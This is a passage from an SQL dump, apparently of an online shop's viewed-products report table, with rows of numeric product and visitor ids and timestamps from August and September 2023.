(6015, NULL, NULL, 2059, 1, '2023-08-14 15:34:58'),
(6016, NULL, NULL, 2053, 1, '2023-08-14 21:10:55'),
(6017, NULL, NULL, 2061, 1, '2023-08-15 03:15:26'),
(6018, NULL, NULL, 2059, 1, '2023-08-15 04:12:44'),
(6019, NULL, NULL, 2061, 1, '2023-08-15 06:06:59'),
(6020, NULL, NULL, 2053, 1, '2023-08-15 08:48:01'),
(6021, NULL, NULL, 2058, 1, '2023-08-15 08:48:12'),
(6022, NULL, NULL, 2054, 1, '2023-08-15 08:49:46'),
(6023, NULL, NULL, 2061, 1, '2023-08-15 08:52:02'),
(6024, NULL, NULL, 2060, 1, '2023-08-15 08:52:33'),
(6025, NULL, NULL, 2055, 1, '2023-08-15 08:53:36'),
(6026, NULL, NULL, 2064, 1, '2023-08-15 08:55:31'),
(6027, NULL, NULL, 2063, 1, '2023-08-15 08:55:41'),
(6028, NULL, NULL, 2061, 1, '2023-08-15 08:56:54'),
(6029, NULL, NULL, 2053, 1, '2023-08-15 08:57:14'),
(6030, NULL, NULL, 2064, 1, '2023-08-15 08:57:56'),
(6031, NULL, NULL, 2059, 1, '2023-08-15 08:58:07'),
(6032, NULL, NULL, 2055, 1, '2023-08-15 08:58:59'),
(6033, NULL, NULL, 2059, 1, '2023-08-15 08:59:10'),
(6034, NULL, NULL, 2062, 1, '2023-08-15 09:00:02'),
(6035, NULL, NULL, 2054, 1, '2023-08-15 09:01:57'),
(6036, NULL, NULL, 2058, 1, '2023-08-15 09:02:08'),
(6037, NULL, NULL, 2063, 1, '2023-08-15 09:05:39'),
(6038, NULL, NULL, 2062, 1, '2023-08-15 09:06:00'),
(6039, NULL, NULL, 2060, 1, '2023-08-15 09:06:11'),
(6040, 1039, NULL, 2061, 1, '2023-08-15 09:29:43'),
(6041, 1039, NULL, 2059, 1, '2023-08-15 09:29:51'),
(6042, 1039, NULL, 2064, 1, '2023-08-15 09:29:55'),
(6043, 1039, NULL, 2058, 1, '2023-08-15 09:30:01'),
(6044, 1039, NULL, 2063, 1, '2023-08-15 09:30:04'),
(6045, 1039, NULL, 2062, 1, '2023-08-15 09:30:07'),
(6046, 1039, NULL, 2054, 1, '2023-08-15 09:30:08'),
(6047, 1039, NULL, 2060, 1, '2023-08-15 09:30:11'),
(6048, 1039, NULL, 2055, 1, '2023-08-15 09:30:13'),
(6211, NULL, NULL, 2061, 1, '2023-08-15 13:34:01'),
(6212, NULL, NULL, 2061, 1, '2023-08-15 16:04:10'),
(6213, NULL, NULL, 2053, 1, '2023-08-15 16:51:26'),
(6214, NULL, NULL, 2054, 1, '2023-08-15 16:51:30'),
(6215, NULL, NULL, 2055, 1, '2023-08-15 16:51:34'),
(6216, NULL, NULL, 2064, 1, '2023-08-15 16:51:46'),
(6217, NULL, NULL, 2063, 1, '2023-08-15 16:51:53'),
(6218, NULL, NULL, 2062, 1, '2023-08-15 16:51:59'),
(6219, NULL, NULL, 2060, 1, '2023-08-15 16:52:02'),
(6220, NULL, NULL, 2059, 1, '2023-08-15 16:52:07'),
(6221, NULL, NULL, 2061, 1, '2023-08-15 16:52:12'),
(6222, NULL, NULL, 2058, 1, '2023-08-15 16:52:15'),
(6223, NULL, NULL, 2064, 1, '2023-08-15 17:22:31'),
(6224, NULL, NULL, 2053, 1, '2023-08-15 19:08:00'),
(6225, NULL, NULL, 2058, 1, '2023-08-15 19:08:10'),
(6226, NULL, NULL, 2054, 1, '2023-08-15 19:09:45'),
(6227, NULL, NULL, 2061, 1, '2023-08-15 19:12:02'),
(6228, NULL, NULL, 2060, 1, '2023-08-15 19:12:33'),
(6229, NULL, NULL, 2055, 1, '2023-08-15 19:13:36'),
(6230, NULL, NULL, 2064, 1, '2023-08-15 19:15:31'),
(6231, NULL, NULL, 2063, 1, '2023-08-15 19:15:42'),
(6232, NULL, NULL, 2061, 1, '2023-08-15 19:16:56'),
(6233, NULL, NULL, 2053, 1, '2023-08-15 19:17:18'),
(6234, NULL, NULL, 2064, 1, '2023-08-15 19:18:00'),
(6235, NULL, NULL, 2059, 1, '2023-08-15 19:18:11'),
(6236, NULL, NULL, 2055, 1, '2023-08-15 19:19:03'),
(6237, NULL, NULL, 2059, 1, '2023-08-15 19:19:13'),
(6238, NULL, NULL, 2062, 1, '2023-08-15 19:20:05'),
(6239, NULL, NULL, 2054, 1, '2023-08-15 19:22:00'),
(6240, NULL, NULL, 2058, 1, '2023-08-15 19:22:10'),
(6241, NULL, NULL, 2063, 1, '2023-08-15 19:25:42'),
(6242, NULL, NULL, 2062, 1, '2023-08-15 19:26:04'),
(6243, NULL, NULL, 2060, 1, '2023-08-15 19:26:14'),
(6244, NULL, NULL, 2055, 1, '2023-08-15 19:45:13'),
(6245, NULL, NULL, 2054, 1, '2023-08-15 20:17:39'),
(6246, NULL, NULL, 2059, 1, '2023-08-16 04:48:49'),
(6247, NULL, NULL, 2059, 1, '2023-08-16 04:51:22'),
(6248, NULL, NULL, 2064, 1, '2023-08-16 06:48:54'),
(6249, NULL, NULL, 2059, 1, '2023-08-16 08:27:19'),
(6250, NULL, NULL, 2060, 1, '2023-08-16 08:28:29'),
(6251, NULL, NULL, 2055, 1, '2023-08-16 08:29:37'),
(6252, NULL, NULL, 2054, 1, '2023-08-16 08:30:38'),
(6253, NULL, NULL, 2060, 1, '2023-08-16 08:30:55'),
(6254, NULL, NULL, 2063, 1, '2023-08-16 08:31:10'),
(6255, NULL, NULL, 2058, 1, '2023-08-16 08:31:41'),
(6256, NULL, NULL, 2062, 1, '2023-08-16 08:31:57'),
(6257, NULL, NULL, 2054, 1, '2023-08-16 12:57:21'),
(6258, NULL, NULL, 2060, 1, '2023-08-16 13:47:31'),
(6259, NULL, NULL, 2059, 1, '2023-08-16 13:48:43'),
(6260, NULL, NULL, 2059, 1, '2023-08-16 13:51:56'),
(6261, NULL, NULL, 2063, 1, '2023-08-16 17:25:30'),
(6262, NULL, NULL, 2063, 1, '2023-08-16 17:47:59'),
(6263, NULL, NULL, 2054, 1, '2023-08-17 03:43:37'),
(6264, NULL, NULL, 2054, 1, '2023-08-17 05:42:42'),
(6265, NULL, NULL, 2059, 1, '2023-08-17 07:52:02'),
(6266, NULL, NULL, 2060, 1, '2023-08-17 07:53:01'),
(6267, NULL, NULL, 2055, 1, '2023-08-17 07:54:01'),
(6268, NULL, NULL, 2054, 1, '2023-08-17 07:54:59'),
(6269, NULL, NULL, 2060, 1, '2023-08-17 07:55:21'),
(6270, NULL, NULL, 2063, 1, '2023-08-17 07:55:30'),
(6271, NULL, NULL, 2058, 1, '2023-08-17 07:55:40'),
(6272, NULL, NULL, 2063, 1, '2023-08-17 07:55:41'),
(6273, NULL, NULL, 2062, 1, '2023-08-17 07:55:51'),
(6274, NULL, NULL, 2058, 1, '2023-08-17 23:55:13'),
(6275, NULL, NULL, 2059, 1, '2023-08-18 05:56:19'),
(6276, NULL, NULL, 2060, 1, '2023-08-18 07:20:07'),
(6277, NULL, NULL, 2055, 1, '2023-08-18 07:21:37'),
(6278, NULL, NULL, 2054, 1, '2023-08-18 07:22:50'),
(6279, NULL, NULL, 2060, 1, '2023-08-18 07:24:33'),
(6280, NULL, NULL, 2063, 1, '2023-08-18 07:25:54'),
(6281, NULL, NULL, 2058, 1, '2023-08-18 07:26:07'),
(6282, NULL, NULL, 2062, 1, '2023-08-18 07:26:29'),
(6283, NULL, NULL, 2061, 1, '2023-08-18 09:04:01'),
(6284, NULL, NULL, 2064, 1, '2023-08-18 18:21:39'),
(6285, NULL, NULL, 2060, 1, '2023-08-19 00:47:00'),
(6286, NULL, NULL, 2055, 1, '2023-08-19 00:48:01'),
(6287, NULL, NULL, 2054, 1, '2023-08-19 00:49:03'),
(6288, NULL, NULL, 2060, 1, '2023-08-19 00:50:01'),
(6289, NULL, NULL, 2063, 1, '2023-08-19 00:51:01'),
(6290, NULL, NULL, 2058, 1, '2023-08-19 00:52:03'),
(6291, NULL, NULL, 2062, 1, '2023-08-19 00:53:07'),
(6292, NULL, NULL, 2063, 1, '2023-08-19 01:08:55'),
(6293, NULL, NULL, 2059, 1, '2023-08-19 02:08:29'),
(6294, NULL, NULL, 2062, 1, '2023-08-19 02:13:34'),
(6295, NULL, NULL, 2064, 1, '2023-08-19 08:47:19'),
(6296, NULL, NULL, 2064, 1, '2023-08-19 11:17:08'),
(6297, NULL, NULL, 2061, 1, '2023-08-19 23:38:06'),
(6298, NULL, NULL, 2059, 1, '2023-08-20 05:14:58'),
(6299, NULL, NULL, 2055, 1, '2023-08-20 10:05:40'),
(6300, NULL, NULL, 2063, 1, '2023-08-20 11:16:03'),
(6301, NULL, NULL, 2063, 1, '2023-08-20 11:16:29'),
(6302, NULL, NULL, 2064, 1, '2023-08-21 03:50:47'),
(6303, NULL, NULL, 2054, 1, '2023-08-21 09:27:03'),
(6304, NULL, NULL, 2060, 1, '2023-08-21 10:09:36'),
(6305, NULL, NULL, 2061, 1, '2023-08-21 10:53:33'),
(6306, NULL, NULL, 2059, 1, '2023-08-21 11:58:02'),
(6307, NULL, NULL, 2064, 1, '2023-08-21 12:48:10'),
(6308, NULL, NULL, 2062, 1, '2023-08-21 13:32:17'),
(6309, NULL, NULL, 2055, 1, '2023-08-21 13:59:54'),
(6310, NULL, NULL, 2055, 1, '2023-08-21 14:39:33'),
(6311, NULL, NULL, 2054, 1, '2023-08-21 15:28:36'),
(6312, NULL, NULL, 2054, 1, '2023-08-21 16:27:55'),
(6313, NULL, NULL, 2060, 1, '2023-08-21 17:06:27'),
(6314, NULL, NULL, 2063, 1, '2023-08-21 17:32:53'),
(6315, NULL, NULL, 2061, 1, '2023-08-21 17:46:51'),
(6316, NULL, NULL, 2063, 1, '2023-08-21 17:59:55'),
(6317, NULL, NULL, 2059, 1, '2023-08-21 18:46:12'),
(6318, NULL, NULL, 2064, 1, '2023-08-21 19:32:28'),
(6319, NULL, NULL, 2062, 1, '2023-08-21 20:13:17'),
(6320, NULL, NULL, 2055, 1, '2023-08-21 21:15:34'),
(6321, NULL, NULL, 2063, 1, '2023-08-21 22:14:55'),
(6322, NULL, NULL, 2058, 1, '2023-08-21 22:32:08'),
(6323, NULL, NULL, 2054, 1, '2023-08-21 23:45:05'),
(6324, NULL, NULL, 2054, 1, '2023-08-22 01:08:36'),
(6325, NULL, NULL, 2054, 1, '2023-08-22 01:43:56'),
(6326, NULL, NULL, 2060, 1, '2023-08-22 02:25:29'),
(6327, NULL, NULL, 2061, 1, '2023-08-22 03:08:22'),
(6328, NULL, NULL, 2059, 1, '2023-08-22 03:18:03'),
(6329, NULL, NULL, 2061, 1, '2023-08-22 03:36:02'),
(6330, NULL, NULL, 2054, 1, '2023-08-22 03:48:11'),
(6331, NULL, NULL, 2060, 1, '2023-08-22 04:28:09'),
(6332, NULL, NULL, 2061, 1, '2023-08-22 05:09:25'),
(6333, NULL, NULL, 2059, 1, '2023-08-22 06:11:21'),
(6334, NULL, NULL, 2064, 1, '2023-08-22 06:58:53'),
(6335, NULL, NULL, 2062, 1, '2023-08-22 07:41:34'),
(6336, NULL, NULL, 2055, 1, '2023-08-22 08:46:53'),
(6337, NULL, NULL, 2054, 1, '2023-08-22 10:04:33'),
(6338, NULL, NULL, 2060, 1, '2023-08-22 10:44:18'),
(6339, NULL, NULL, 2061, 1, '2023-08-22 11:25:28'),
(6340, NULL, NULL, 2059, 1, '2023-08-22 12:25:47'),
(6341, NULL, NULL, 2064, 1, '2023-08-22 13:12:04'),
(6342, NULL, NULL, 2062, 1, '2023-08-22 13:20:08'),
(6343, NULL, NULL, 2062, 1, '2023-08-22 13:53:08'),
(6344, NULL, NULL, 2054, 1, '2023-08-22 14:44:22'),
(6345, NULL, NULL, 2055, 1, '2023-08-22 14:56:19'),
(6346, NULL, NULL, 2054, 1, '2023-08-22 16:04:06'),
(6347, NULL, NULL, 2060, 1, '2023-08-22 16:43:48'),
(6348, NULL, NULL, 2054, 1, '2023-08-22 17:20:04'),
(6349, NULL, NULL, 2061, 1, '2023-08-22 17:24:12'),
(6350, NULL, NULL, 2059, 1, '2023-08-22 18:23:40'),
(6351, NULL, NULL, 2064, 1, '2023-08-22 19:09:59'),
(6352, NULL, NULL, 2054, 1, '2023-08-22 20:09:02'),
(6353, NULL, NULL, 2060, 1, '2023-08-22 20:48:18'),
(6354, NULL, NULL, 2061, 1, '2023-08-22 21:29:14'),
(6355, NULL, NULL, 2059, 1, '2023-08-22 22:28:37'),
(6356, NULL, NULL, 2064, 1, '2023-08-22 23:14:49'),
(6357, NULL, NULL, 2054, 1, '2023-08-22 23:46:49'),
(6358, NULL, NULL, 2060, 1, '2023-08-23 00:26:05'),
(6359, NULL, NULL, 2061, 1, '2023-08-23 01:06:25'),
(6360, NULL, NULL, 2059, 1, '2023-08-23 02:06:21'),
(6361, NULL, NULL, 2064, 1, '2023-08-23 02:55:12'),
(6362, NULL, NULL, 2062, 1, '2023-08-23 03:42:22'),
(6363, NULL, NULL, 2063, 1, '2023-08-23 04:24:03'),
(6364, NULL, NULL, 2055, 1, '2023-08-23 04:52:32'),
(6365, NULL, NULL, 2059, 1, '2023-08-23 05:10:05'),
(6366, NULL, NULL, 2063, 1, '2023-08-23 05:51:55'),
(6367, NULL, NULL, 2058, 1, '2023-08-23 06:09:14'),
(6368, NULL, NULL, 2058, 1, '2023-08-23 06:09:20'),
(6369, NULL, NULL, 2054, 1, '2023-08-23 07:55:02'),
(6370, NULL, NULL, 2058, 1, '2023-08-23 13:04:17'),
(6371, NULL, NULL, 2059, 1, '2023-08-23 15:12:09'),
(6372, NULL, NULL, 2060, 1, '2023-08-23 15:12:27'),
(6373, NULL, NULL, 2054, 1, '2023-08-23 20:10:26'),
(6374, NULL, NULL, 2060, 1, '2023-08-23 20:49:43'),
(6375, NULL, NULL, 2054, 1, '2023-08-23 21:54:24'),
(6376, NULL, NULL, 2060, 1, '2023-08-23 22:31:56'),
(6377, NULL, NULL, 2054, 1, '2023-08-23 23:16:53'),
(6378, NULL, NULL, 2060, 1, '2023-08-23 23:54:10'),
(6379, NULL, NULL, 2061, 1, '2023-08-24 00:34:05'),
(6380, NULL, NULL, 2061, 1, '2023-08-24 00:39:45'),
(6381, NULL, NULL, 2059, 1, '2023-08-24 01:34:24'),
(6382, NULL, NULL, 2064, 1, '2023-08-24 01:48:19'),
(6383, NULL, NULL, 2064, 1, '2023-08-24 02:21:47'),
(6384, NULL, NULL, 2062, 1, '2023-08-24 03:03:15'),
(6385, NULL, NULL, 2054, 1, '2023-08-24 03:47:30'),
(6386, NULL, NULL, 2060, 1, '2023-08-24 04:26:12'),
(6387, NULL, NULL, 2061, 1, '2023-08-24 05:06:24'),
(6388, NULL, NULL, 2059, 1, '2023-08-24 06:06:22'),
(6389, NULL, NULL, 2061, 1, '2023-08-24 06:18:18'),
(6390, NULL, NULL, 2064, 1, '2023-08-24 06:53:02'),
(6391, NULL, NULL, 2062, 1, '2023-08-24 07:34:17'),
(6392, NULL, NULL, 2062, 1, '2023-08-24 07:38:27'),
(6393, NULL, NULL, 2055, 1, '2023-08-24 08:38:08'),
(6394, NULL, NULL, 2063, 1, '2023-08-24 09:38:19'),
(6395, NULL, NULL, 2064, 1, '2023-08-24 09:39:53'),
(6396, NULL, NULL, 2054, 1, '2023-08-24 10:09:47'),
(6397, NULL, NULL, 2060, 1, '2023-08-24 10:49:36'),
(6398, NULL, NULL, 2061, 1, '2023-08-24 11:31:03'),
(6399, NULL, NULL, 2059, 1, '2023-08-24 12:32:41'),
(6400, NULL, NULL, 2064, 1, '2023-08-24 13:20:27'),
(6401, NULL, NULL, 2062, 1, '2023-08-24 14:02:39'),
(6402, NULL, NULL, 2061, 1, '2023-08-24 14:54:52'),
(6403, NULL, NULL, 2055, 1, '2023-08-24 15:07:53'),
(6404, NULL, NULL, 2063, 1, '2023-08-24 16:08:46'),
(6405, NULL, NULL, 2058, 1, '2023-08-24 16:26:43'),
(6406, NULL, NULL, 2061, 1, '2023-08-24 17:30:40'),
(6407, NULL, NULL, 2061, 1, '2023-08-24 18:21:48'),
(6408, NULL, NULL, 2059, 1, '2023-08-25 00:59:13'),
(6409, NULL, NULL, 2053, 1, '2023-08-25 02:40:00'),
(6410, NULL, NULL, 2054, 1, '2023-08-25 02:45:44'),
(6411, NULL, NULL, 2059, 1, '2023-08-25 02:56:34'),
(6412, NULL, NULL, 2060, 1, '2023-08-25 03:26:12'),
(6413, NULL, NULL, 2061, 1, '2023-08-25 04:07:48'),
(6414, NULL, NULL, 2054, 1, '2023-08-25 04:59:19'),
(6415, NULL, NULL, 2059, 1, '2023-08-25 04:59:23'),
(6416, NULL, NULL, 2061, 1, '2023-08-25 04:59:26'),
(6417, NULL, NULL, 2058, 1, '2023-08-25 04:59:30'),
(6418, NULL, NULL, 2059, 1, '2023-08-25 05:09:29'),
(6419, NULL, NULL, 2064, 1, '2023-08-25 05:47:48'),
(6420, NULL, NULL, 2064, 1, '2023-08-25 05:57:45'),
(6421, NULL, NULL, 2062, 1, '2023-08-25 06:40:00'),
(6422, NULL, NULL, 2064, 1, '2023-08-25 06:50:18'),
(6423, NULL, NULL, 2055, 1, '2023-08-25 07:45:26'),
(6424, NULL, NULL, 2063, 1, '2023-08-25 08:46:26'),
(6425, NULL, NULL, 2058, 1, '2023-08-25 09:04:00'),
(6426, NULL, NULL, 2064, 1, '2023-08-25 09:39:53'),
(6427, NULL, NULL, 2061, 1, '2023-08-25 14:21:48'),
(6428, NULL, NULL, 2062, 1, '2023-08-26 01:20:20'),
(6429, NULL, NULL, 2055, 1, '2023-08-26 01:59:10'),
(6430, NULL, NULL, 2064, 1, '2023-08-26 03:22:30'),
(6431, NULL, NULL, 2055, 1, '2023-08-26 04:13:47'),
(6432, NULL, NULL, 2063, 1, '2023-08-26 06:19:51'),
(6433, NULL, NULL, 2059, 1, '2023-08-26 06:51:56'),
(6434, NULL, NULL, 2055, 1, '2023-08-26 12:53:58'),
(6435, NULL, NULL, 2060, 1, '2023-08-26 15:01:56'),
(6436, NULL, NULL, 2054, 1, '2023-08-26 15:44:38'),
(6437, NULL, NULL, 2064, 1, '2023-08-26 16:42:27'),
(6438, NULL, NULL, 2055, 1, '2023-08-27 04:12:14'),
(6439, NULL, NULL, 2060, 1, '2023-08-27 14:01:35'),
(6440, NULL, NULL, 2058, 1, '2023-08-27 22:21:20'),
(6441, NULL, NULL, 2064, 1, '2023-08-28 04:08:39'),
(6442, NULL, NULL, 2060, 1, '2023-08-28 07:47:52'),
(6443, NULL, NULL, 2063, 1, '2023-08-28 07:58:06'),
(6444, NULL, NULL, 2058, 1, '2023-08-28 08:24:20'),
(6445, NULL, NULL, 2062, 1, '2023-08-28 08:40:09');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(6446, NULL, NULL, 2062, 1, '2023-08-28 09:02:36'),
(6447, NULL, NULL, 2055, 1, '2023-08-28 09:15:25'),
(6448, NULL, NULL, 2060, 1, '2023-08-28 10:26:38'),
(6449, NULL, NULL, 2063, 1, '2023-08-28 10:37:02'),
(6450, NULL, NULL, 2058, 1, '2023-08-28 11:02:52'),
(6451, NULL, NULL, 2055, 1, '2023-08-28 11:53:08'),
(6452, NULL, NULL, 2061, 1, '2023-08-28 13:22:39'),
(6453, NULL, NULL, 2060, 1, '2023-08-28 14:01:30'),
(6454, NULL, NULL, 2063, 1, '2023-08-28 14:13:50'),
(6455, NULL, NULL, 2058, 1, '2023-08-28 14:44:22'),
(6456, NULL, NULL, 2055, 1, '2023-08-28 15:42:49'),
(6457, NULL, NULL, 2054, 1, '2023-08-28 16:12:09'),
(6458, NULL, NULL, 2055, 1, '2023-08-28 16:12:31'),
(6459, NULL, NULL, 2064, 1, '2023-08-28 16:14:00'),
(6460, NULL, NULL, 2063, 1, '2023-08-28 16:14:24'),
(6461, NULL, NULL, 2062, 1, '2023-08-28 16:14:45'),
(6462, NULL, NULL, 2060, 1, '2023-08-28 16:15:06'),
(6463, NULL, NULL, 2059, 1, '2023-08-28 16:15:26'),
(6464, NULL, NULL, 2061, 1, '2023-08-28 16:15:51'),
(6465, NULL, NULL, 2058, 1, '2023-08-28 16:16:11'),
(6466, NULL, NULL, 2061, 1, '2023-08-28 17:12:23'),
(6467, NULL, NULL, 2062, 1, '2023-08-28 17:59:20'),
(6468, NULL, NULL, 2060, 1, '2023-08-28 18:34:10'),
(6469, NULL, NULL, 2063, 1, '2023-08-28 18:44:28'),
(6470, NULL, NULL, 2058, 1, '2023-08-28 19:09:37'),
(6471, NULL, NULL, 2055, 1, '2023-08-28 20:00:04'),
(6472, NULL, NULL, 2061, 1, '2023-08-28 21:27:55'),
(6473, NULL, NULL, 2062, 1, '2023-08-28 22:13:23'),
(6474, NULL, NULL, 2054, 1, '2023-08-28 23:56:20'),
(6475, NULL, NULL, 2059, 1, '2023-08-29 00:22:49'),
(6476, NULL, NULL, 2064, 1, '2023-08-29 00:42:39'),
(6477, NULL, NULL, 2060, 1, '2023-08-29 03:56:10'),
(6478, NULL, NULL, 2064, 1, '2023-08-29 04:40:46'),
(6479, NULL, NULL, 2058, 1, '2023-08-29 07:15:26'),
(6480, NULL, NULL, 2053, 1, '2023-08-29 08:32:19'),
(6481, NULL, NULL, 2062, 1, '2023-08-29 10:22:51'),
(6482, NULL, NULL, 2060, 1, '2023-08-29 10:24:50'),
(6483, NULL, NULL, 2063, 1, '2023-08-29 10:26:51'),
(6484, NULL, NULL, 2055, 1, '2023-08-29 10:28:50'),
(6485, NULL, NULL, 2054, 1, '2023-08-29 10:30:50'),
(6486, NULL, NULL, 2060, 1, '2023-08-29 10:32:50'),
(6487, NULL, NULL, 2063, 1, '2023-08-29 10:34:51'),
(6488, NULL, NULL, 2058, 1, '2023-08-29 10:36:51'),
(6489, NULL, NULL, 2060, 1, '2023-08-29 14:10:56'),
(6490, NULL, NULL, 2063, 1, '2023-08-29 14:24:03'),
(6491, NULL, NULL, 2058, 1, '2023-08-29 14:56:28'),
(6492, NULL, NULL, 2055, 1, '2023-08-29 16:00:55'),
(6493, NULL, NULL, 2064, 1, '2023-08-29 16:03:34'),
(6494, NULL, NULL, 2061, 1, '2023-08-29 16:03:44'),
(6495, NULL, NULL, 2060, 1, '2023-08-29 16:03:51'),
(6496, NULL, NULL, 2063, 1, '2023-08-29 16:04:12'),
(6497, NULL, NULL, 2062, 1, '2023-08-29 16:04:38'),
(6498, NULL, NULL, 2058, 1, '2023-08-29 16:05:03'),
(6499, NULL, NULL, 2059, 1, '2023-08-29 16:05:21'),
(6500, NULL, NULL, 2054, 1, '2023-08-29 16:05:27'),
(6501, NULL, NULL, 2055, 1, '2023-08-29 16:05:34'),
(6502, NULL, NULL, 2053, 1, '2023-08-29 16:07:37'),
(6503, NULL, NULL, 2060, 1, '2023-08-29 16:32:40'),
(6504, NULL, NULL, 2063, 1, '2023-08-29 16:43:15'),
(6505, NULL, NULL, 2058, 1, '2023-08-29 17:09:17'),
(6506, NULL, NULL, 2055, 1, '2023-08-29 17:58:43'),
(6507, NULL, NULL, 2061, 1, '2023-08-29 19:28:29'),
(6508, NULL, NULL, 2062, 1, '2023-08-29 20:15:57'),
(6509, NULL, NULL, 2061, 1, '2023-08-29 20:36:45'),
(6510, NULL, NULL, 2054, 1, '2023-08-29 21:52:38'),
(6511, NULL, NULL, 2059, 1, '2023-08-29 22:14:39'),
(6512, NULL, NULL, 2064, 1, '2023-08-29 22:31:10'),
(6513, NULL, NULL, 2063, 1, '2023-08-29 23:46:44'),
(6514, NULL, NULL, 2060, 1, '2023-08-30 01:29:55'),
(6515, NULL, NULL, 2063, 1, '2023-08-30 01:44:09'),
(6516, NULL, NULL, 2058, 1, '2023-08-30 02:19:59'),
(6517, NULL, NULL, 2061, 1, '2023-08-30 02:21:36'),
(6518, NULL, NULL, 2055, 1, '2023-08-30 03:21:28'),
(6519, NULL, NULL, 2064, 1, '2023-08-30 03:36:51'),
(6520, NULL, NULL, 2061, 1, '2023-08-30 05:14:58'),
(6521, NULL, NULL, 2062, 1, '2023-08-30 06:10:12'),
(6522, NULL, NULL, 2055, 1, '2023-08-30 07:26:59'),
(6523, NULL, NULL, 2064, 1, '2023-08-30 07:27:02'),
(6524, NULL, NULL, 2061, 1, '2023-08-30 07:27:04'),
(6525, NULL, NULL, 2058, 1, '2023-08-30 07:27:07'),
(6526, NULL, NULL, 2054, 1, '2023-08-30 08:04:47'),
(6527, NULL, NULL, 2059, 1, '2023-08-30 08:27:18'),
(6528, NULL, NULL, 2064, 1, '2023-08-30 08:44:21'),
(6529, NULL, NULL, 2061, 1, '2023-08-30 10:32:01'),
(6530, NULL, NULL, 2061, 1, '2023-08-30 11:24:17'),
(6531, NULL, NULL, 2064, 1, '2023-08-30 20:10:29'),
(6532, NULL, NULL, 2061, 1, '2023-08-31 00:44:57'),
(6533, NULL, NULL, 2058, 1, '2023-08-31 01:34:59'),
(6534, NULL, NULL, 2054, 1, '2023-08-31 11:37:41'),
(6535, NULL, NULL, 2055, 1, '2023-08-31 11:41:42'),
(6536, NULL, NULL, 2062, 1, '2023-08-31 13:00:15'),
(6537, NULL, NULL, 2059, 1, '2023-08-31 17:09:02'),
(6538, NULL, NULL, 2060, 1, '2023-09-01 02:15:46'),
(6539, NULL, NULL, 2063, 1, '2023-09-01 03:42:58'),
(6540, NULL, NULL, 2054, 1, '2023-09-01 05:25:43'),
(6541, NULL, NULL, 2055, 1, '2023-09-01 15:48:17'),
(6542, NULL, NULL, 2064, 1, '2023-09-02 03:06:25'),
(6543, NULL, NULL, 2060, 1, '2023-09-02 04:54:38'),
(6544, NULL, NULL, 2062, 1, '2023-09-02 04:58:21'),
(6545, NULL, NULL, 2064, 1, '2023-09-02 11:29:56'),
(6546, NULL, NULL, 2059, 1, '2023-09-02 11:44:41'),
(6547, NULL, NULL, 2054, 1, '2023-09-02 12:37:54'),
(6548, NULL, NULL, 2060, 1, '2023-09-02 13:17:14'),
(6549, NULL, NULL, 2061, 1, '2023-09-02 13:59:11'),
(6550, NULL, NULL, 2059, 1, '2023-09-02 15:05:28'),
(6551, NULL, NULL, 2054, 1, '2023-09-02 15:51:28'),
(6552, NULL, NULL, 2064, 1, '2023-09-02 15:57:01'),
(6553, NULL, NULL, 2054, 1, '2023-09-02 17:11:19'),
(6554, NULL, NULL, 2060, 1, '2023-09-02 18:14:06'),
(6555, NULL, NULL, 2061, 1, '2023-09-02 19:20:08'),
(6556, NULL, NULL, 2059, 1, '2023-09-02 20:59:56'),
(6557, NULL, NULL, 2064, 1, '2023-09-02 22:16:23'),
(6558, NULL, NULL, 2055, 1, '2023-09-02 22:18:56'),
(6559, NULL, NULL, 2062, 1, '2023-09-02 23:20:51'),
(6560, NULL, NULL, 2054, 1, '2023-09-03 00:13:45'),
(6561, NULL, NULL, 2059, 1, '2023-09-03 00:32:01'),
(6562, NULL, NULL, 2059, 1, '2023-09-03 00:32:01'),
(6563, NULL, NULL, 2061, 1, '2023-09-03 00:32:01'),
(6564, NULL, NULL, 2063, 1, '2023-09-03 00:32:03'),
(6565, NULL, NULL, 2061, 1, '2023-09-03 00:32:03'),
(6566, NULL, NULL, 2062, 1, '2023-09-03 00:32:03'),
(6567, NULL, NULL, 2064, 1, '2023-09-03 00:32:04'),
(6568, NULL, NULL, 2055, 1, '2023-09-03 00:32:04'),
(6569, NULL, NULL, 2064, 1, '2023-09-03 00:32:05'),
(6570, NULL, NULL, 2063, 1, '2023-09-03 00:32:05'),
(6571, NULL, NULL, 2054, 1, '2023-09-03 00:32:07'),
(6572, NULL, NULL, 2058, 1, '2023-09-03 00:32:11'),
(6573, NULL, NULL, 2058, 1, '2023-09-03 00:32:12'),
(6574, NULL, NULL, 2062, 1, '2023-09-03 00:32:15'),
(6575, NULL, NULL, 2060, 1, '2023-09-03 00:32:16'),
(6576, NULL, NULL, 2063, 1, '2023-09-03 01:04:34'),
(6577, NULL, NULL, 2060, 1, '2023-09-03 01:12:10'),
(6578, NULL, NULL, 2061, 1, '2023-09-03 02:13:12'),
(6579, NULL, NULL, 2059, 1, '2023-09-03 03:14:19'),
(6580, NULL, NULL, 2059, 1, '2023-09-03 03:29:45'),
(6581, NULL, NULL, 2059, 1, '2023-09-03 03:45:45'),
(6582, NULL, NULL, 2064, 1, '2023-09-03 04:56:34'),
(6583, NULL, NULL, 2062, 1, '2023-09-03 05:56:36'),
(6584, NULL, NULL, 2055, 1, '2023-09-03 07:42:54'),
(6585, NULL, NULL, 2063, 1, '2023-09-03 09:15:41'),
(6586, NULL, NULL, 2058, 1, '2023-09-03 09:47:32'),
(6587, NULL, NULL, 2058, 1, '2023-09-03 12:40:46'),
(6588, NULL, NULL, 2061, 1, '2023-09-04 08:31:01'),
(6589, NULL, NULL, 2055, 1, '2023-09-05 00:19:51'),
(6590, NULL, NULL, 2059, 1, '2023-09-05 00:21:19'),
(6591, NULL, NULL, 2054, 1, '2023-09-05 00:23:15'),
(6592, NULL, NULL, 2064, 1, '2023-09-05 00:24:36'),
(6593, NULL, NULL, 2053, 1, '2023-09-05 00:26:38'),
(6594, NULL, NULL, 2060, 1, '2023-09-05 00:30:53'),
(6595, NULL, NULL, 2063, 1, '2023-09-05 00:36:42'),
(6596, NULL, NULL, 2054, 1, '2023-09-05 00:37:49'),
(6597, NULL, NULL, 2060, 1, '2023-09-05 00:41:10'),
(6598, NULL, NULL, 2062, 1, '2023-09-05 00:46:55'),
(6599, NULL, NULL, 2058, 1, '2023-09-05 00:53:04'),
(6600, NULL, NULL, 2063, 1, '2023-09-05 00:58:09'),
(6601, NULL, NULL, 2062, 1, '2023-09-05 06:16:31'),
(6602, NULL, NULL, 2054, 1, '2023-09-05 11:13:34'),
